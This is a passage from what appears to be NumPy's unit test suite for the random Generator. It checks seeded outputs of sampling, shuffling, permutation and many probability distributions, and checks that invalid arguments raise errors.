assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
@pytest.mark.parametrize("dtype", [int, object])
@pytest.mark.parametrize("axis, expected",
[(None, np.array([[3, 7, 0, 9, 10, 11],
[8, 4, 2, 5, 1, 6]])),
(0, np.array([[6, 1, 2, 9, 10, 11],
[0, 7, 8, 3, 4, 5]])),
(1, np.array([[ 5, 3, 4, 0, 2, 1],
[11, 9, 10, 6, 8, 7]]))])
def test_permuted(self, dtype, axis, expected):
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
random.permuted(x, axis=axis, out=x)
assert_array_equal(x, expected)
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
y = random.permuted(x, axis=axis)
assert y.dtype == dtype
assert_array_equal(y, expected)
def test_permuted_with_strides(self):
random = Generator(MT19937(self.seed))
x0 = np.arange(22).reshape(2, 11)
x1 = x0.copy()
x = x0[:, ::3]
y = random.permuted(x, axis=1, out=x)
expected = np.array([[0, 9, 3, 6],
[14, 20, 11, 17]])
assert_array_equal(y, expected)
x1[:, ::3] = expected
# Verify that the original x0 was modified in-place as expected.
assert_array_equal(x1, x0)
def test_permuted_empty(self):
y = random.permuted([])
assert_array_equal(y, [])
@pytest.mark.parametrize('outshape', [(2, 3), 5])
def test_permuted_out_with_wrong_shape(self, outshape):
a = np.array([1, 2, 3])
out = np.zeros(outshape, dtype=a.dtype)
with pytest.raises(ValueError, match='same shape'):
random.permuted(a, out=out)
def test_permuted_out_with_wrong_type(self):
out = np.zeros((3, 5), dtype=np.int32)
x = np.ones((3, 5))
with pytest.raises(TypeError, match='Cannot cast'):
random.permuted(x, axis=1, out=out)
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
